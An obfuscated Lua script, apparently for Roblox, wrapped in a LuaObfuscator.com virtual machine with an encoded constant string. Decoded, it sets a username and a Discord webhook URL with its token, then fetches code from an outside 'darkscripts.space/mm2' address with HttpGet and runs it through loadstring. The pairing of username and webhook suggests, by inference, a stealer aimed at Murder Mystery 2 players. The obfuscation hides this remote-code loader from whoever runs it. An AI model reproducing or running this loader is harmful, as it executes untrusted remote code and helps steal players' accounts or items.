--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v6=string.rep;local v182=table.concat;local v142=table.insert;local v259=math.ldexp;local v111=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v83=v2(v0(v30,16));if v19 then local v90=0;local v91;while true do if (v90==1) then return v91;end if (v90==0) then v91=v6(v83,v19);v19=nil;v90=1;end end else return v83;end end end);local function v20(v31,v32,v33) if v33 then local v84=(v31/((5 -3)^(v32-1)))%(((1 + 4) -3)^(((v33-(1 -(877 -(282 + 595)))) -(v32-1)) + (2 -1))) ;return v84-(v84%(620 -((2192 -(1523 + 114)) + 64))) ;else local v85=931 -(857 + 67 + 7) ;local v86;while true do if (v85==(568 -(367 + (286 -85)))) then v86=(929 -(214 + 713))^(v32-1) ;return (((v31%(v86 + v86))>=v86) and 1) or (0 + 0) ;end end end end local function v21() local v34=0 -0 ;local v35;while true do if (v34==(1066 -(68 + 997))) then return v35;end if (v34==(0 + 0)) then v35=v1(v16,v18,v18);v18=v18 + 1 + 0 ;v34=1271 -(226 + 1044) ;end end end local function v22() local v36,v37=v1(v16,v18,v18 + (4 -2) );v18=v18 + 2 ;return (v37 * (472 -216)) + v36 ;end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (4 -1) );v18=v18 + (9 -5) ;return (v41 * (16777566 -(64 + 23 + 263))) + (v40 * (65716 -((266 -199) + 113))) + (v39 * (188 + 68)) + v38 ;end local function v24() local v42=952 -(802 + 150) ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(7 -4)) then if (v47==(0 -0)) then if (v46==(0 + (1747 -(760 + 987)))) then return v48 * (1486 -(998 + 488)) ;else v47=1;v45=997 -(915 + 82) ;end elseif (v47==(5796 -(5662 -(1789 + 124)))) then return ((v46==((766 -(745 + 21)) + 0 + 0)) and (v48 * ((1139 -(116 + 1022))/(0 -0)))) or (v48 * NaN) ;end return v259(v48,v47-(1344 -321) ) * (v45 + (v46/(2^(1239 -(1069 + 118))))) ;end if (v42==(4 -2)) then v47=v20(v44,45 -24 ,76 -45 );v48=((v20(v44,6 + 26 )==((2 -1) -0)) and  -(1 + 0)) or (886 -(261 + (2447 -1823))) ;v42=794 -(368 + 423) ;end if (v42==(3 -2)) then v45=19 -(10 + 8) ;v46=(v20(v44,3 -2 ,462 -(416 + 26) ) * ((9 -7)^((1 + 101) -(55 + 15)))) + v43 ;v42=1 + 1 ;end if (v42==0) then v43=v23();v44=v23();v42=1;end end end local function v25(v49) local v50;if  not v49 then v49=v23();if (v49==0) then return "";end end v50=v3(v16,v18,(v18 + v49) -(1056 -(87 + 968)) );v18=v18 + v49 ;local v51={};for v66=4 -3 , #v50 do v51[v66]=v2(v1(v3(v50,v66,v66)));end return v182(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return 1990 -(582 + 1408) ;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();while true do local v68=(function() return 0;end)();while true do if (v68==(0 -0)) then if (v52==(1 -0)) then local v96=(function() return 0;end)();while true do if (v96==0) then v56=(function() return {};end)();v57=(function() return {v54,v55,nil,v56};end)();v96=(function() return 1825 -(1195 + 629) ;end)();end if (1~=v96) then else v58=(function() return v23();end)();v52=(function() return 2;end)();break;end end end if (v52==3) then for v99= #"~",v23() do local v100=(function() return v21();end)();if (v20(v100, #"]", #"~")~=0) then else local v102=(function() return 0;end)();local v103=(function() return;end)();local v104=(function() return;end)();local v105=(function() return;end)();while true do if (v102~=(2 -0)) then else if (v20(v104, #">", #"\\")== #"\\") then v105[243 -(187 + 54) ]=(function() return v59[v105[2]];end)();end if (v20(v104,2,782 -(162 + 618) )~= #" ") then else v105[ #"91("]=(function() return v59[v105[ #"-19"]];end)();end v102=(function() return 3 + 0 ;end)();end if (v102~=3) then else if (v20(v104, #"gha", #"xxx")== #"<") then v105[ #".com"]=(function() return v59[v105[ #"http"]];end)();end v54[v99]=(function() return v105;end)();break;end if (v102~=1) then else local v157=(function() return 0;end)();local v158=(function() return;end)();while true do if (v157==(0 + 0)) then v158=(function() return 0;end)();while true do if (1~=v158) then else v102=(function() return 2;end)();break;end if (v158~=(0 -0)) then else v105=(function() return {v22(),v22(),nil,nil};end)();if (v103==0) then local v168=(function() return 0 -0 ;end)();local v169=(function() return;end)();while true do if (v168==0) then v169=(function() return 0;end)();while true do if (v169==(0 + 0)) then v105[ #"gha"]=(function() return v22();end)();v105[ #".dev"]=(function() return v22();end)();break;end end break;end end elseif (v103== #">") then v105[ #"91("]=(function() return v23();end)();elseif (v103==(1638 -(1373 + 263))) then v105[ #"91("]=(function() return v23() -((1002 -(451 + 549))^(6 + 10)) ;end)();elseif (v103== #"19(") then local v175=(function() return 0 -0 ;end)();local v176=(function() return;end)();while true do if (v175==0) then v176=(function() return 0;end)();while true do if (v176~=0) then else v105[ #"nil"]=(function() return v23() -(2^(26 -10)) ;end)();v105[ #"0313"]=(function() return v22();end)();break;end end break;end end end v158=(function() return 1385 -(746 + 638) ;end)();end end break;end end end if (0==v102) then v103=(function() return v20(v100,1 + 1 , #"asd");end)();v104=(function() return v20(v100, #"0836",8 -2 );end)();v102=(function() return 1;end)();end end end end for v101= #">",v23() do v55,v101,v28=(function() return v53(v55,v101,v28);end)();end return v57;end v68=(function() return 342 -(218 + 123) ;end)();end if (v68~=(1582 -(1535 + 46))) then else if (0==v52) then local v97=(function() return 0 + 0 ;end)();while true do if (v97==1) then v55=(function() return {};end)();v52=(function() return 1;end)();break;end if (v97==0) then v53=(function() return function(v145,v146,v147) local v148=(function() return 0;end)();local v149=(function() return;end)();while true do if (v148==(0 + 0)) then v149=(function() return 560 -(306 + 254) ;end)();while true do if (v149==0) then local v166=(function() return 0 + 0 ;end)();local v167=(function() return;end)();while true do if (v166~=(0 -0)) then else v167=(function() return 0;end)();while true do if (v167==(1467 -(899 + 568))) then local v171=(function() return 0;end)();while true do if ((0 + 0)==v171) then v145[v146-#"," ]=(function() return v147();end)();return v145,v146,v147;end end end end break;end end end end break;end end end;end)();v54=(function() return {};end)();v97=(function() return 2 -1 ;end)();end end end if (v52==2) then local v98=(function() return 0;end)();while true do if (v98==1) then v57[ #"91("]=(function() return v21();end)();v52=(function() return 3;end)();break;end if (v98==0) then v59=(function() return {};end)();for v107= #"~",v58 do local v108=(function() return 0;end)();local v109=(function() return;end)();local v110=(function() return;end)();while true do if (0==v108) then local v159=(function() return 603 -(268 + 335) ;end)();while true do if (v159~=(290 -(60 + 230))) then else v109=(function() return v21();end)();v110=(function() return nil;end)();v159=(function() return 1;end)();end if (v159==1) then v108=(function() return 573 -(426 + 146) ;end)();break;end end end if (v108==(1 + 0)) then if (v109== #" ") then v110=(function() return v21()~=(1456 -(282 + 1174)) ;end)();elseif (v109==(813 -(569 + 242))) then v110=(function() return v24();end)();elseif (v109~= #"nil") then else v110=(function() return v25();end)();end v59[v107]=(function() return v110;end)();break;end end end v98=(function() return 1;end)();end end end break;end end end end local function v29(v60,v61,v62) local v63=v60[2 -1 ];local v64=v60[2];local v65=v60[1 + 0 + 2 ];return function(...) local v69=v63;local v70=v64;local v71=v65;local v72=v27;local v73=(1517 -492) -((1042 -(144 + 192)) + 318) ;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -(1272 -((1161 -(42 + 174)) + 326)) ;local v78={};local v79={};for v87=0 -(0 + 0) ,v77 do if (v87>=v71) then v75[v87-v71 ]=v76[v87 + 1 + 0 ];else v79[v87]=v76[v87 + (701 -(271 + 429)) ];end end local v80=(v77-v71) + 1 + 0 ;local v81;local v82;while true do v81=v69[v73];v82=v81[3 -2 ];if (v82<=(5 + 0 + 2)) then if ((v82<=(1503 -(1408 + 92))) or (788>2514)) then if (v82<=(1087 -(196 + 265 + 625))) then if (v82>(1288 -(993 + 295))) then v79[v81[1 + (1505 -(363 + 1141)) ]]=v81[1174 -(418 + 753) ];else v79[v81[1 + 1 ]]=v62[v81[1 + 2 ]];end elseif ((v82>(1 + 1)) or (55==2387)) then v79[v81[1 + 1 ]]();else local v115=v81[(2111 -(1183 + 397)) -(406 + 123) ];v79[v115]=v79[v115](v13(v79,v115 + (2 -1) ,v74));end elseif (v82<=((5400 -3626) -(1749 + 20))) then if (v82>4) then do return;end else local v117=v81[1 + 1 ];local v118=v79[v81[3]];v79[v117 + (1323 -(1249 + 73)) ]=v118;v79[v117]=v118[v81[2 + 2 ]];end elseif (v82==(23 -17)) then local v122=v81[1147 -(466 + 679) ];local v123=v79[v81[6 -(3 + 0) ]];v79[v122 + (2 -1) ]=v123;v79[v122]=v123[v81[381 -(142 + 235) ]];else local v127=0 -0 ;local v128;while true do if (v127==(0 + 0 + 0)) then v128=v81[1902 -(106 + 1794) ];v79[v128]=v79[v128](v13(v79,v128 + 1 + 0 ,v74));break;end end end elseif (v82<=(20 -(1984 -(1913 + 62)))) then if ((1454<2491) and (v82<=(3 + 6))) then if (v82>(8 + 0)) then v62[v81[(6 + 2) -5 ]]=v79[v81[5 -3 ]];else v79[v81[(2 -1) + 1 ]]=v62[v81[117 -(4 + 110) ]];end elseif ((v82>(594 -(57 + 527))) or (4157<=2803)) then v62[v81[(3363 -(565 + 1368)) -(41 + (5212 -3826)) ]]=v79[v81[5 -3 ]];else v79[v81[(1766 -(1477 + 184)) -(17 + 86) ]]=v81[(3 -0) + 0 ];end elseif (v82<=(28 -15)) then if ((4853>=2982) and (v82>(34 -22))) then local v137=v81[(157 + 11) -(122 + 44) ];local v138,v139=v72(v79[v137](v13(v79,v137 + 1 + 0 ,v81[5 -2 ])));v74=(v139 + v137) -(3 -2) ;local v140=0 + 0 ;for v150=v137,v74 do v140=v140 + 1 + 0 ;v79[v150]=v138[v140];end else do return;end end elseif (v82>(27 -13)) then local v141=v81[67 -(30 + 35) ];local v142,v143=v72(v79[v141](v13(v79,v141 + (1131 -(369 + 761)) ,v81[3])));v74=(v143 + v141) -(1 + 0) ;local v144=1257 -(1043 + 214) ;for v153=v141,v74 do v144=v144 + (3 -(858 -(564 + 292))) ;v79[v153]=v142[v144];end else v79[v81[2]]();end v73=v73 + (1213 -(323 + 889)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!083Q0003083Q00557365726E616D6503143Q007369796168676979656E67656E6379743534363303073Q00576562682Q6F6B03793Q00682Q7470733A2Q2F646973636F72642E636F6D2F6170692F776562682Q6F6B732F313238363936343332303136383537343938362F66594E6230515F646A5955342Q5F7A2Q725867706B7659394763416633505955756E346E6432677164754334652D42624736764D6A525950657277662D73764E7A445051030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574031D3Q00682Q7470733A2Q2F6461726B736372697074732E73706163652F2Q6D32000C3Q00120A3Q00023Q0012093Q00013Q00120A3Q00043Q0012093Q00033Q00124Q00053Q00122Q000100063Q00200400010001000700120A000300084Q000F000100034Q00075Q00022Q00033Q000100012Q000C3Q00017Q00",v111(),...);
